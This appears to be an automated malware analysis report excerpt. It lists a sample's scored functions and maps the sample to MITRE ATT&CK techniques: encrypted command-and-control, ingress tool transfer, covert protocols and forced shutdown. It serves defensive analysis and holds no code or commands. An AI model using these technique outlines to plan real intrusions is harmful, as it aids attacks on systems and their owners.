Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre